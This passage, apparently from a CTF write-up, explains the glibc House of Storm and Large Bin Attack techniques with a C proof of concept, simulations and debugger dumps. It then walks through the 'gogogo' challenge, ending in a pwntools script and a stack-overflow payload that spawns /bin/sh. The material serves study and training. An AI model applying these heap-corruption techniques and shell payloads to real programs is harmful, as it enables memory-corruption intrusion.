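    target = bk_nextsize + FD_NEXTSIZE_OFFSET  # == fake_chunk + 3
    mem[target:target + 8] = struct.pack("<Q", victim)
    return struct.unpack_from("<Q", mem, fake_chunk + SIZE_OFFSET)[0]


print(hex(forged_size_after_write(0x55555555A000)))
print(hex(forged_size_after_write(0x564CC7B72540)))
```

Only the sixth byte of the pointer reaches the size field; the two zero bytes above it keep the rest of the field clean, as long as the memory there was zero to begin with.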

The program then gets fake_chunk back from malloc and writes "/bin/sh" into it, which serves as the argument to system.

How the libc version affects House Of Storm

libc-2.30

if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))
malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)");

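This is similar to the unlink check (is the next chunk of the target's previous chunk the target itself?)

House Of Storm overwrites fwd->bk_nextsize, so the check fails and House Of Storm stops working.

Ptmalloc algorithm: Largebin Attack

The Large Bin Attack is one of the harder attacks: it has many preconditions and is fairly complex to carry out. It is usually paired with the Unsorted Bin to build house of storm and increase its impact.

  • In libc-2.29 and earlier, a Large Bin Attack can write two addresses
  • In libc-2.30 and later, a Large Bin Attack can write only one address

Large bin

Chunks of 512 bytes or more (1024 on 64-bit) are called large chunks; the large bins manage these large chunks.

A largebin is a doubly linked list whose chunks are ordered by size, starting from the fd pointer of the head node.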

/*
  This struct declaration is misleading (but accurate and necessary).
  It declares a "view" into memory allowing access to necessary
  fields at known offsets from a given base. See explanation below.
*/
struct malloc_chunk {
    INTERNAL_SIZE_T prev_size;        /* Size of previous chunk (if free). */
    INTERNAL_SIZE_T size;             /* Size in bytes, including overhead. */
    struct malloc_chunk* fd;          /* double links -- used only if free. */
    struct malloc_chunk* bk;
    /* Only used for large blocks: pointer to next larger size. */
    struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
    struct malloc_chunk* bk_nextsize;
};

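In this struct, fd_nextsize and bk_nextsize link to the head of the next size group and the head of the previous size group, while chunks of the same size are managed among themselves through fd and bk

  • The list linked by fd_nextsize and bk_nextsize is the horizontal list; the list linked by fd and bk is the vertical list

In the horizontal list the heap manager maintains a circular, monotonic list: the largest size (the largest under this bin index) is the head, the smallest size is the tail, and head and tail are linked to each other

Largebin basics:

  • There are 63 largebins in total, with indexes 64~126; the chunks in one bin are not all the same size but fall within a size range
  • The largebin structure differs from every other list and is more complex
  • Besides the fd and bk pointers, a largebin chunk also has the fd_nextsize and bk_nextsize pointers
  • Insertion into a largebin is neither LIFO nor FIFO; it follows its own ordering rule

Largebin properties:

  • Chunks are sorted from largest to smallest; chunks of equal size are ordered by the time they were freed
  • Among several chunks of the same size, only the first one has fd_nextsize and bk_nextsize pointing to other chunks; for the following ones both fields are "0"
  • The bk_nextsize of the largest chunk points to the smallest chunk, and the fd_nextsize of the smallest chunk points to the largest chunk

The following code shows how a chunk is inserted into a largebin: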

if (in_smallbin_range(size)) /* smallbin (ignored for now) */
{
    victim_index = smallbin_index(size); // index of the smallbin for this size
    bck = bin_at(av, victim_index);      // bck points to the head of that smallbin
    // fwd points to the most recently added chunk of that smallbin (smallbins insert at the head)
    fwd = bck->fd;
}
else /* largebin (the core part) */
{
    /*
    victim => the chunk to insert
    fwd    => ends up as the chunk victim->fd points to (used to position victim)
    bck    => ends up as the chunk victim->bk points to (used to position victim)
    */

    victim_index = largebin_index(size); /* index of the largebin for this size */
    bck = bin_at(av, victim_index);
    fwd = bck->fd;
    /*
    fwd     => the largest chunk (the first chunk after the bin head)
    bck     => the head of the corresponding largebin
    bck->fd => the largest chunk in this largebin (also the first chunk)
    bck->bk => the smallest chunk in this largebin (also the last chunk)
    */

    // if the largebin is not empty, insert in sorted order
    if (fwd != bck) {
        /* Or with inuse bit to speed comparisons */
        size |= PREV_INUSE;
        assert((bck->bk->size & NON_MAIN_ARENA) == 0); // assert is not enabled by default

        if ((unsigned long) (size) < (unsigned long) (bck->bk->size)) {
            /*
            bck->bk points to the smallest chunk in this largebin.
            If size < bck->bk->size, victim becomes the new smallest chunk,
            so it has to be appended at the tail of this largebin.
            */

            fwd = bck;     /* fwd = the bin head */
            bck = bck->bk; /* bck = the old tail (the last chunk) */

            victim->fd_nextsize = fwd->fd;
            /* victim->fd_nextsize = the largest chunk */
            victim->bk_nextsize = fwd->fd->bk_nextsize;
            /* victim->bk_nextsize = the old smallest chunk */
            fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
            /* first store victim in "old smallest chunk"->fd_nextsize */
            /* then store victim in "largest chunk"->bk_nextsize */
        }
        else /* victim is not (strictly) the smallest chunk in the largebin */
        {
            assert((fwd->size & NON_MAIN_ARENA) == 0); // assert is not enabled by default
            // walk from largest to smallest (head to tail) to find the right position
            while ((unsigned long) size < fwd->size) {
                fwd = fwd->fd_nextsize; /* keep advancing fwd until size >= fwd->size */
                assert((fwd->size & NON_MAIN_ARENA) == 0);
            }

            if ((unsigned long) size == (unsigned long) fwd->size)
                /* equal size: insert right behind the head of that vertical list */
                fwd = fwd->fd; /* fwd = the chunk after the head of that vertical list (the head is skipped) */
            else
            {
                /* sizes differ (size > fwd->size): victim starts a new vertical list */
                /* fwd = the head of the vertical list that will follow victim */

                victim->fd_nextsize = fwd;
                /* victim->fd_nextsize = the vertical list whose size is smaller than victim */
                victim->bk_nextsize = fwd->bk_nextsize;
                /* victim->bk_nextsize = the vertical list whose size is larger than victim */
                fwd->bk_nextsize = victim;
                /* "smaller list"->bk_nextsize = victim */
                victim->bk_nextsize->fd_nextsize = victim;
                /* "larger list"->fd_nextsize = victim */
            }
            bck = fwd->bk; /* bck = the chunk currently in front of fwd */
        }
    }
    else // the largebin is empty: victim forms a vertical list on its own
        victim->fd_nextsize = victim->bk_nextsize = victim;
        /* first store victim in victim->bk_nextsize */
        /* then store victim in victim->fd_nextsize */
}
mark_bin(av, victim_index); // mark the bin that receives victim as non-empty
// link victim into the largebin list
victim->bk = bck; /* bck = the chunk victim->bk points to */
victim->fd = fwd; /* fwd = the chunk victim->fd points to */
fwd->bk = victim;
bck->fd = victim;

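This reveals the following rules:

  • Across vertical lists: the largebin orders the vertical lists from largest to smallest
  • Within a vertical list: a newly added chunk is inserted right behind the head, while the chunk at the head stays fixed (unless all other members have been allocated)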
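
The two ordering rules can be illustrated with a deliberately simplified model. The sketch below does not reproduce glibc's pointers: it assumes a bin is a Python list of `(size, members)` groups, and `largebin_insert` is a hypothetical helper that only mimics where a new chunk ends up.

```python
def largebin_insert(groups, name, size):
    """Insert chunk `name` into `groups`, kept sorted by size (largest first).

    Each group models one vertical list: (size, [head, member, ...]).
    """
    for i, (gsize, members) in enumerate(groups):
        if size == gsize:
            # Same size: the head stays fixed, the newcomer goes second.
            members.insert(1, name)
            return
        if size > gsize:
            # Larger than this group: start a new vertical list in front of it.
            groups.insert(i, (size, [name]))
            return
    # Smaller than everything in the bin: new vertical list at the tail.
    groups.append((size, [name]))


bin_model = []
for chunk, chunk_size in [("a", 0x500), ("b", 0x510), ("c", 0x500),
                          ("d", 0x500), ("e", 0x4F0)]:
    largebin_insert(bin_model, chunk, chunk_size)

for group_size, group_members in bin_model:
    print(hex(group_size), group_members)
```

In this model chunk "a" remains the head of the 0x500 group no matter how many equal-sized chunks arrive later, matching the "always insert in the second position" behaviour of the real code.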

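Large Bin Attack

The Large Bin Attack takes place while a chunk is being moved from the unsorted bin into a largebin

  • Writing the first address:
victim->bk_nextsize->fd_nextsize = victim;

victim->bk_nextsize is copied from fwd->bk_nextsize, so if we forge that pointer we can make the program write a heap chunk address to a target location

  • Writing the second address:
bck->fd = victim; /* bck is fwd->bk */

If we control fwd->bk, we can again write a heap chunk address to a target location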
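
To make the two writes concrete, here is a minimal simulation of the unchecked (pre-2.30) insertion path. It is a sketch under stated assumptions: memory is modelled as a Python dict from address to 8-byte value, the field offsets are those of the 64-bit `malloc_chunk`, and the addresses and the helper name `insert_larger_than_fwd` are made up for illustration.

```python
FD, BK, FD_NEXTSIZE, BK_NEXTSIZE = 0x10, 0x18, 0x20, 0x28  # 64-bit offsets


def insert_larger_than_fwd(mem, fwd, victim):
    """Replay the pointer writes of the 'victim is larger than fwd' branch."""
    mem[victim + FD_NEXTSIZE] = fwd
    mem[victim + BK_NEXTSIZE] = mem[fwd + BK_NEXTSIZE]
    mem[fwd + BK_NEXTSIZE] = victim
    mem[mem[victim + BK_NEXTSIZE] + FD_NEXTSIZE] = victim  # first write
    bck = mem[fwd + BK]
    mem[victim + BK] = bck
    mem[victim + FD] = fwd
    mem[fwd + BK] = victim
    mem[bck + FD] = victim                                 # second write


p2, p3 = 0x1000, 0x2000            # largebin chunk and unsorted chunk (made up)
target1, target2 = 0x7000, 0x7008  # the two locations we want to overwrite

# Forge p2: bk = target1 - 0x10, bk_nextsize = target2 - 0x20.
mem = {p2 + BK: target1 - 0x10, p2 + BK_NEXTSIZE: target2 - 0x20}
insert_larger_than_fwd(mem, fwd=p2, victim=p3)
print(hex(mem[target1]), hex(mem[target2]))
```

The subtractions mirror the field offsets: a forged bk must point 0x10 below the target (the offset of fd), and a forged bk_nextsize 0x20 below it (the offset of fd_nextsize).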

The following is an example exploit:

#include<stdio.h>
#include<stdlib.h>
#include<assert.h>

int main()
{

    unsigned long stack_var1 = 0;
    unsigned long stack_var2 = 0;

    fprintf(stderr, "stack_var1 (%p): %ld\n", &stack_var1, stack_var1);
    fprintf(stderr, "stack_var2 (%p): %ld\n\n", &stack_var2, stack_var2);

    unsigned long *p1 = malloc(0x420);
    malloc(0x20); /* guard chunk: prevents consolidation */
    unsigned long *p2 = malloc(0x500);
    malloc(0x20);
    unsigned long *p3 = malloc(0x500);
    malloc(0x20);

    free(p1);
    free(p2);
    malloc(0x90);

    free(p3);

    p2[-1] = 0x3f1;
    p2[0] = 0;
    p2[2] = 0;
    p2[1] = (unsigned long)(&stack_var1 - 2); /* bk: unsigned long is 8 bytes on 64-bit, so this is &stack_var1 - 0x10 */
    p2[3] = (unsigned long)(&stack_var2 - 4); /* bk_nextsize: &stack_var2 - 0x20 */

    malloc(0x90);

    fprintf(stderr, "stack_var1 (%p): %p\n", &stack_var1, (void *)stack_var1);
    fprintf(stderr, "stack_var2 (%p): %p\n", &stack_var2, (void *)stack_var2);

    return 0;
}
➜  桌面 ./test 
stack_var1 (0x7fffc5efda80): 0
stack_var2 (0x7fffc5efda88): 0

stack_var1 (0x7fffc5efda80): 0x55ea64ab09a0
stack_var2 (0x7fffc5efda88): 0x55ea64ab09a0

Both stack variables have been overwritten. Let's walk through what actually happens

Right after "p1" and "p2" are freed:

unsortedbin
all: 0x55555555a360 —▸ 0x55555555a000 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x55555555a360
/* p2 -> p1 -> main_arena */

As expected, both go into the unsortedbin. On the next allocation, ptmalloc sorts the chunks into the matching bins according to their "size":

unsortedbin
all: 0x55555555a0a0 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x55555555a0a0
/* p1 (after the split) -> main_arena */
largebins
0x500: 0x55555555a360 —▸ 0x7ffff7dd1fa8 (main_arena+1160) ◂— 0x55555555a360
/* The scan runs from back to front; p1 satisfies the split condition, so p1 is split and p2 goes into the largebins */

Next, free p3 and then modify p2:

unsortedbin
all: 0x55555555a8a0 —▸ 0x55555555a0a0 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x55555555a8a0
/* p3 -> p1 (after the split) -> main_arena */
  • Before the modification:
pwndbg> x/20xg 0x55555555a360
0x55555555a360: 0x0000000000000000 0x0000000000000511
0x55555555a370: 0x00007ffff7dd1fa8 0x00007ffff7dd1fa8
0x55555555a380: 0x000055555555a360 0x000055555555a360
00:0000│ rsp 0x7fffffffdf10 ◂— 0x0 // stack_var1
01:0008│     0x7fffffffdf18 ◂— 0x0 // stack_var2
  • After the modification:
pwndbg> x/20xg 0x55555555a360
0x55555555a360: 0x0000000000000000 0x00000000000003f1
0x55555555a370: 0x0000000000000000 0x00007fffffffdf00 // stack_var1 - 2
0x55555555a380: 0x0000000000000000 0x00007fffffffdef8 // stack_var2 - 4
00:0000│ rsp 0x7fffffffdf10 —▸ 0x55555555a8a0 ◂— 0x0 // stack_var1
01:0008│     0x7fffffffdf18 —▸ 0x55555555a8a0 ◂— 0x0 // stack_var2

stack_var1 (0x7fffffffdf10): 0x55555555a8a0
stack_var2 (0x7fffffffdf18): 0x55555555a8a0

The address of "p3" has been written into both "stack_var1" and "stack_var2". This relies on the following code:

victim->bk_nextsize->fd_nextsize = victim;
bck->fd = victim; /* bck is fwd->bk */

After "p2" has been overwritten, the next allocation does the following:

  • p3 is moved into the largebin; its layout is:
pwndbg> x/20xg 0x55555555b8a0
0x55555555b8a0: 0x0000000000000000 0x0000000000000511
0x55555555b8b0: 0x000055555555b360 0x00007fffffffdf00
/* FD = p2 BK = stack_var1-2 */
0x55555555b8c0: 0x000055555555b360 0x00007fffffffdef8
/* fd_nextsize = p2 bk_nextsize = stack_var2-4 */
  • The earlier writes changed the size of p2, which makes p3 the head of a new vertical list
  • Because "p3->size" is larger than "p2->size", p3 is inserted in front of p2
  • The following pseudocode explains the layout of p3 once it is in the largebin:
fwd = bck->fd /* fwd starts at the first chunk of the bin */
fwd = fwd->fd_nextsize /* walk the list for a suitable fwd; it ends up as p2 (already forged) */
/* fwd = p2 */

bck = fwd->bk /* fwd is p2 here, and fwd->bk is "stack_var1-2" */
/* bck = stack_var1-2 */

victim->bk = bck /* bk = stack_var1 - 2 */
victim->fd = fwd /* fd = p2 */
victim->bk_nextsize = fwd->bk_nextsize /* bk_nextsize = stack_var2 - 4 */
victim->fd_nextsize = fwd /* fd_nextsize = p2 */
  • Finally, why "stack_var1" and "stack_var2" get modified:
/* fwd = p2 */
/* bck = stack_var1-2 */

fwd->bk_nextsize = victim /* p2->bk_nextsize=victim */
victim->bk_nextsize->fd_nextsize = victim /* (stack_var2-4)->fd_nextsize=victim */
fwd->bk = victim /* p2->bk=victim */
bck->fd = victim /* (stack_var1-2)->fd=victim */
01:0008│     0x7fffffffdef8 ◂— 0x0 // stack_var2-4
02:0010│ r8  0x7fffffffdf00 —▸ 0x7fffffffdf40 —▸ 0x555555555330 (__libc_csu_init) ◂— endbr64 // stack_var1-2
03:0018│     0x7fffffffdf08 —▸ 0x5555555552c6 (main+316) ◂— mov rax, qword ptr [rbp - 0x30]
04:0020│ rsp 0x7fffffffdf10 —▸ 0x55555555b8a0 ◂— 0x0 // stack_var1
05:0028│     0x7fffffffdf18 —▸ 0x55555555b8a0 ◂— 0x0 // stack_var2
/* (stack_var2-4)->fd_nextsize=stack_var2 */
/* (stack_var1-2)->fd=stack_var1 */
pwndbg> x/20xg 0x55555555b360 /* p2 */
0x55555555b360: 0x0000000000000000 0x00000000000003f1
0x55555555b370: 0x0000000000000000 0x000055555555b8a0 // p3
0x55555555b380: 0x0000000000000000 0x000055555555b8a0 // p3

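The check in libc-2.30

if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))
    malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)");

glibc 2.30 added an integrity check on the doubly linked list, much like the unsorted bin checks added in glibc 2.29. The difference is that this check only exists on the path taken when the unsorted chunk being inserted is larger than the largebin chunk it is compared against. In other words, if we craft an unsorted chunk that is smaller than every chunk in the largebin, the unchecked first branch below can still be exploited
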

if ((unsigned long)(size)
< (unsigned long)chunksize_nomask(bck->bk))
{
fwd = bck;
bck = bck->bk;
victim->fd_nextsize = fwd->fd;
victim->bk_nextsize = fwd->fd->bk_nextsize;
fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
}
else
{
assert(chunk_main_arena(fwd));
while ((unsigned long)size < chunksize_nomask(fwd))
{
fwd = fwd->fd_nextsize;
assert(chunk_main_arena(fwd));
}
if ((unsigned long)size
== (unsigned long)chunksize_nomask(fwd))
/* Always insert in the second position. */
fwd = fwd->fd;
else
{
victim->fd_nextsize = fwd;
victim->bk_nextsize = fwd->bk_nextsize;
if (__glibc_unlikely(fwd->bk_nextsize->fd_nextsize != fwd))
malloc_printerr("malloc(): largebin double linked list corrupted (nextsize)");
fwd->bk_nextsize = victim;
victim->bk_nextsize->fd_nextsize = victim;
}
bck = fwd->bk;
if (bck->fd != fwd)
malloc_printerr("malloc(): largebin double linked list corrupted (bk)");
}
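
The surviving single write can be simulated in the same style. Again this is only a sketch: memory is a Python dict, the offsets are those of the 64-bit `malloc_chunk`, and the addresses and the helper name `insert_smallest` are hypothetical. It replays the first branch above, which has no integrity check.

```python
FD, BK, FD_NEXTSIZE, BK_NEXTSIZE = 0x10, 0x18, 0x20, 0x28  # 64-bit offsets


def insert_smallest(mem, bin_head, victim):
    """Replay the 'victim is smaller than everything in the bin' branch."""
    fwd = bin_head
    bck = mem[bin_head + BK]           # old tail of the bin
    first = mem[fwd + FD]              # largest chunk in the bin
    mem[victim + FD_NEXTSIZE] = first
    mem[victim + BK_NEXTSIZE] = mem[first + BK_NEXTSIZE]
    mem[mem[victim + BK_NEXTSIZE] + FD_NEXTSIZE] = victim  # the arbitrary write
    mem[first + BK_NEXTSIZE] = victim
    # Common tail of the insertion code.
    mem[victim + BK] = bck
    mem[victim + FD] = fwd
    mem[fwd + BK] = victim
    mem[bck + FD] = victim


bin_head, large, victim, target = 0x100, 0x1000, 0x2000, 0x7000  # made up
mem = {
    bin_head + FD: large, bin_head + BK: large,
    large + FD: bin_head, large + BK: bin_head,
    large + FD_NEXTSIZE: large,
    large + BK_NEXTSIZE: target - 0x20,   # the only forged field
}
insert_smallest(mem, bin_head, victim)
print(hex(mem[target]))
```

Only bk_nextsize of the chunk already in the largebin needs to be forged, which is why one address can still be written on glibc 2.30 and later.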

gogogo

➜  [/home/ywhkkx/桌面] ./gogogo       
LET'S BEGIN TO PLAY A GUESS GAME IN HFCTF!
PLEASE INPUT A NUMBER:
gogogo: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, Go BuildID=OPIhFHMrY-7UFXwK1kut/ps8Q_hGCHEf-Am9x5tdv/3tThvdTnrIvrW8jtkHHX/yCVwqchmGGNZd485XtOR, stripped

[*] '/home/ywhkkx/桌面/gogogo'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)

After two numbers are entered, the main part of the program starts:

➜  桌面 ./gogogo 
LET'S BEGIN TO PLAY A GUESS GAME IN HFCTF!
PLEASE INPUT A NUMBER:

Decompiled Go code really is ugly:

void __cdecl main_main()
{
__int64 v0; // r14
_QWORD *v1; // rax
__int64 v2; // [rsp-38h] [rbp-98h]
__int64 v3; // [rsp-38h] [rbp-98h]
__int64 v4; // [rsp-38h] [rbp-98h]
__int64 v5; // [rsp-38h] [rbp-98h]
__int64 v6; // [rsp-38h] [rbp-98h]
__int64 v7; // [rsp-38h] [rbp-98h]
__int64 v8; // [rsp-38h] [rbp-98h]
_QWORD *v9; // [rsp+0h] [rbp-60h]
_QWORD v10[2]; // [rsp+48h] [rbp-18h] BYREF

while ( (unsigned __int64)v10 <= *(_QWORD *)(v0 + 16) )
runtime_morestack_noctxt();
v10[0] = &unk_49D7C0;
v10[1] = &off_4CFBB0;
fmt_Fprintln(v2);
fmt_Fprintln(v3);
runtime_newobject(v4);
v9 = v1;
fmt_Fscanf(v5);
if ( *v9 == 305419896LL )
{
fmt_Fprintln(v6);
runtime_makeslice(v7);
bufio___ptr_Reader__Read(v8);
}
else
{
fmt_Fprintln(v6);
}
}

After a first pass with a plugin (I used IDAGolangHelper):

void __cdecl main_main()
{
__int64 v0; // r14
_QWORD *v1; // rax
_QWORD *v2; // [rsp+0h] [rbp-60h]
_QWORD v3[2]; // [rsp+48h] [rbp-18h] BYREF

while ( (unsigned __int64)v3 <= *(_QWORD *)(v0 + 16) )
runtime_morestack_noctxt();
v3[0] = &unk_49D7C0;
v3[1] = &off_4CFBB0;
fmt_Fprintln();
fmt_Fprintln();
runtime_newobject();
/* runtime.newobject() is the Go runtime function that allocates an object on the heap; it is a thin wrapper around runtime.mallocgc */
v2 = v1;
fmt_Fscanf();
if ( *v2 == 305419896LL )
/* fmt_Fscanf() is presumably the input call, and v2 presumably points to the value that was read */
{
fmt_Fprintln();
runtime_makeslice();
bufio__ptr_Reader_Read();
/* bufio.(*Reader).Read reads input into a byte slice (presumably the one just created by runtime_makeslice) */
}
else
{
fmt_Fprintln();
}
}

The program asks for a number, so enter "305419896" (0x12345678):

➜  桌面 ./gogogo 
LET'S BEGIN TO PLAY A GUESS GAME IN HFCTF!
PLEASE INPUT A NUMBER:
305419896
OKAY YOU CAN LEAVE YOUR NAME AND BYE~

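That seems to have failed, and I don't know why (entering any other number makes the program exit immediately). I also noticed:

  • Breakpoints set in main_main have no effect at all
  • The IDA pseudocode contains many fmt_Fprintf() calls, each of which prints a single character
  • fmt_Fprintln() prints a string followed by "\n"

Go creates the runtime.main goroutine through runtime·newproc, and runtime.main then starts main.main, which is the main function we normally write

Since I'm not familiar with Go internals, I set a breakpoint at runtime.main and traced the program flow step by step

  • The program kept looping inside math_init and could not be debugged (after single-stepping in IDA it came back to where it started; I still don't know why)
  • In the end I escaped the loop by setting breakpoints and found the target data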
if ( v2 == 1717986918 )
{
bytes_In(); /* my guess: this reads input */
}
else if ( v2 != 1416925456 )
{
fmt_Fprintf();
fmt_Fprintf();
fmt_Fprintf();
v139 = &unk_49D7C0;
v140 = &off_4CFC10;
fmt_Fprintln();
return;
}
  • First input: 1717986918 (0x66666666)
  • Second input: 1416925456 (0x54749110)
➜  桌面 ./gogogo        
LET'S BEGIN TO PLAY A GUESS GAME IN HFCTF!
PLEASE INPUT A NUMBER:
1717986918
LET'S BEGIN TO PLAY A GUESS GAME IN HFCTF!
PLEASE INPUT A NUMBER:
1416925456
BYE~


NOW WE BEGIN A BULLS AND COWS GAME
YOU HAVE SEVEN CHANCES TO GUESS // seven attempts

That takes us to the next stage. Debugging locates the relevant code; it is roughly the following:

v138 = &unk_49D7C0;
v139 = &unk_4CFC00;
v3 = qword_551500;
fmt_Fprintln();
while ( 2 )
{
v150 = time_Now();
/* get the current time */
v151 = v3;
v152 = v4;
math_rand__ptr_Rand_Seed();
/* seed the random number generator */
math_rand__ptr_Rand_Intn();
/* produce a random number */
v67[0] = v5;
math_rand__ptr_Rand_Intn();
while ( v67[0] == v6 )
math_rand__ptr_Rand_Intn();
v74 = v6;
math_rand__ptr_Rand_Intn();
v8 = v67[0];
for ( i = v74; v8 == v7 || v7 == i; i = v74 )
{
math_rand__ptr_Rand_Intn();
v8 = v67[0];
}
v73 = v7;
math_rand__ptr_Rand_Intn();
v11 = v67[0];
v12 = v74;
for ( j = v73; v11 == v10 || v10 == v12 || v10 == j; j = v73 )
{
math_rand__ptr_Rand_Intn();
v11 = v67[0];
v12 = v74;
}
v71 = v10;

It is ugly, but the gist is clear: the random numbers are derived from the "system time". The final input is read here:

fmt_Fscanf();
v26 = *v85;
if ( v67[0] != *v85 ) /* my guess: v67[0] is a random number and v85 is the input value */
{
v29 = v73;
v32 = v82;
v31 = v83;
v27 = v74;
v28 = v84;
v30 = v71;
goto LABEL_44;
}
LABEL_44:
v33 = *v28;
v34 = *v31;
v35 = *v32;
v36 = v67[0] == *v28 || v67[0] == v34 || v67[0] == v35;
if ( v27 == v26 || v27 == v34 || v27 == v35 )
++v36;
if ( v29 == v33 || v29 == v26 || v29 == v35 )
++v36;
if ( v30 == v26 || v30 == v34 || v30 == v33 )
++v36;
v67[1] = v36;
runtime_convT64(v64);
v80 = v24;
runtime_convT64(v65);
v153 = "\b";
v154 = v80;
v155 = "\b";
v156 = v25;
fmt_Fprintf();
v124 = &unk_49D7C0;
v125 = &unk_4CFC00;
v3 = qword_551500;
fmt_Fprintln();
v18 = v72 + 1;
v17 = v82;

Single-stepping did not make this code any clearer to me, but the program itself gives hints:

NOW WE BEGIN A BULLS AND COWS GAME
YOU HAVE SEVEN CHANCES TO GUESS
$ 6
0A1B
$ 999
0A0B

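0A1B? 0A0B? My guess was that these are hints of some kind, and a fellow pwner on my team recognized this as the "1A2B game" (Bulls and Cows)

You and your opponent each pick a four-digit number with no repeated digits
Once the game starts, both sides take turns guessing the other's number; each result is added to your own guess history and is expressed with A and B
A is the number of guessed digits that are correct and in the correct position
B is the number of guessed digits that are correct but in a different position
For example, if the opponent's number is 1234 and you guess 5283, then 2 is correct and in the right position and 3 is correct but in the wrong position, so the result is 1A1B
The first player to guess the opponent's number completely (that is, the first to get 4A) wins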
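
The scoring rule is easy to express in code. The sketch below is an illustration rather than the challenge's own logic: it assumes four distinct decimal digits, and the names `score` and `prune` are hypothetical. `prune` shows how feedback could narrow the candidate set, which is the basis of a smarter strategy than plain enumeration.

```python
from itertools import permutations


def score(secret, guess):
    """Return (A, B) for a guess, assuming all digits in each tuple are distinct."""
    a = sum(s == g for s, g in zip(secret, guess))   # right digit, right place
    b = sum(g in secret for g in guess) - a          # right digit, wrong place
    return a, b


def prune(candidates, guess, feedback):
    """Keep only the secrets that would have produced this feedback."""
    return [c for c in candidates if score(c, guess) == feedback]


print(score((1, 2, 3, 4), (5, 2, 8, 3)))   # the 1234 / 5283 example from the rules

all_secrets = list(permutations(range(10), 4))
remaining = prune(all_secrets, (5, 2, 8, 3), (1, 1))
print(len(all_secrets), len(remaining))
```

Each answer from the program shrinks `remaining`; a solver would pick its next guess from that list instead of counting upwards.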

Further experiments showed that the digits have to be separated by spaces:

NOW WE BEGIN A BULLS AND COWS GAME
YOU HAVE SEVEN CHANCES TO GUESS
$ 1234
1A1B
$ 5678
1A1B /* clearly inconsistent with the rules */
NOW WE BEGIN A BULLS AND COWS GAME
YOU HAVE SEVEN CHANCES TO GUESS
$ 1 2 3 4
1A0B
$ 5 6 7 8
0A2B /* this looks right */

What remains is a question of algorithm. I decided to "guess" the number by brute-forcing every possibility, but I ran into many bugs along the way and it took a long time to get working. Here is the attack script (a bit ugly, but easy to follow):

A=0
B=0
C=0
D=0
E=0

p.recvuntil('YOU HAVE SEVEN CHANCES TO GUESS\n')
while(True):
    E=E+1

    payload=str(A)+' '+str(B)+' '+str(C)+' '+str(D)
    p.sendline(payload)
    sleep(0.001) # a short sleep is required here, otherwise errors occur
    success("now is :"+str(A)+' '+str(B)+' '+str(C)+' '+str(D))

    recv = p.recv(5)
    if recv[0:1]==b'Y':
        success("find it")
        p.sendline("e")
        break

    a = int(recv[0:1]) # number of A
    b = int(recv[2:3]) # number of B

    success("A="+str(a)+","+"B="+str(b))
    # advance the 4-digit counter A B C D by one, with carry
    D=D+1
    if D==10:
        D=0
        C=C+1
        if C==10:
            C=0
            B=B+1
            if B==10:
                B=0
                A=A+1

    if a==3:
        success("close.......")

    # seven guesses used up: start a new round
    if E==7:
        E=0
        p.recvuntil('TRY AGAIN?\n')
        p.sendline("a")
        p.recvuntil('YOU HAVE SEVEN CHANCES TO GUESS\n')

Next we arrive here (it looks like a heap challenge):

I THINK I SHOULD USE ANOTHER FAMILIAR THING TO KEEP YOU!!!!
YOU HAVE FIVE CHOICE:
(0) INPUT
(1) OUTPUT
(2) EDIT
(3) CLEAR
(4) EXIT

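The same teammate found a stack overflow, and I couldn't think of anything better (I'm not familiar with Go's heap anyway)

After choosing "4" we get one more input, and whatever we enter triggers "exit". This is the last opportunity, so here is the code first:
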
p.recvuntil('(4) EXIT\n')
p.sendline('4')
_syscall_Syscall = 0x47CF05
binsh = 0xc0000aa000
payload = b'/bin/sh\x00'*0x8c + p64(_syscall_Syscall) + p64(0) + p64(59) + p64(binsh) + p64(0) + p64(0)
p.recvuntil('ARE YOU SURE?\n')
p.send(payload)

Suppose we send only 0x8c copies of "/bin/sh\x00":

0x45c849    syscall  <SYS_exit_group>
rdi: 0x0
rsi: 0x0
rdx: 0x0
r10: 0x1
0x45c84b ret

0x45c84c int3
0x45c84d int3
0x45c84e int3
pwndbg> search -s /bin/sh
[anon_c000000] 0xc000045b18 0x68732f6e69622f /* '/bin/sh' */
[anon_c000000] 0xc000045b20 0x68732f6e69622f /* '/bin/sh' */
[anon_c000000] 0xc000045b28 0x68732f6e69622f /* '/bin/sh' */
[anon_c000000] 0xc000045b30 0x68732f6e69622f /* '/bin/sh' */
........
[anon_c000000] 0xc00007c430 0x68732f6e69622f /* '/bin/sh' */
[anon_c000000] 0xc00007c438 0x68732f6e69622f /* '/bin/sh' */
[anon_c000000] 0xc00007c440 0x68732f6e69622f /* '/bin/sh' */
[anon_c000000] 0xc00007c448 0x68732f6e69622f /* '/bin/sh' */
[anon_c000000] 0xc00007c450 0x68732f6e69622f /* '/bin/sh' */
[anon_c000000] 0xc00007c458 0x68732f6e69622f /* '/bin/sh' */
pwndbg> stack 50
00:0000│ rsp 0xc000045f78 —▸ 0x43217c ◂— xorps xmm15, xmm15 /* top of the stack */

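So the current top of the stack (the slot that "ret" is about to use) is under our control. Writing "_syscall_Syscall" there hijacks the instruction pointer and performs a system call

#define __NR_execve 59
/* "0" overwrites the return address of "_syscall_Syscall", "59" is the execve syscall number, and the rest are the arguments */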
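
The layout of that payload can be written out without pwntools to see which qword ends up where. This is a sketch only: `build_payload` is a hypothetical helper, the two addresses are the ones used in this writeup, and the meaning of each slot follows the comment above.

```python
import struct


def build_payload(syscall_addr, binsh_addr, pad_qwords=0x8C):
    """Padding up to the saved return slot, then the fake call frame."""
    padding = b"/bin/sh\x00" * pad_qwords          # 0x8c * 8 = 0x460 bytes
    frame = struct.pack(
        "<6Q",
        syscall_addr,  # overwrites the return address used by "ret"
        0,             # return address seen by _syscall_Syscall (unused)
        59,            # syscall number: execve
        binsh_addr,    # 1st argument: pointer to "/bin/sh"
        0,             # 2nd argument: argv = NULL
        0,             # 3rd argument: envp = NULL
    )
    return padding + frame


payload = build_payload(0x47CF05, 0xC0000AA000)
print(hex(len(payload)))
```

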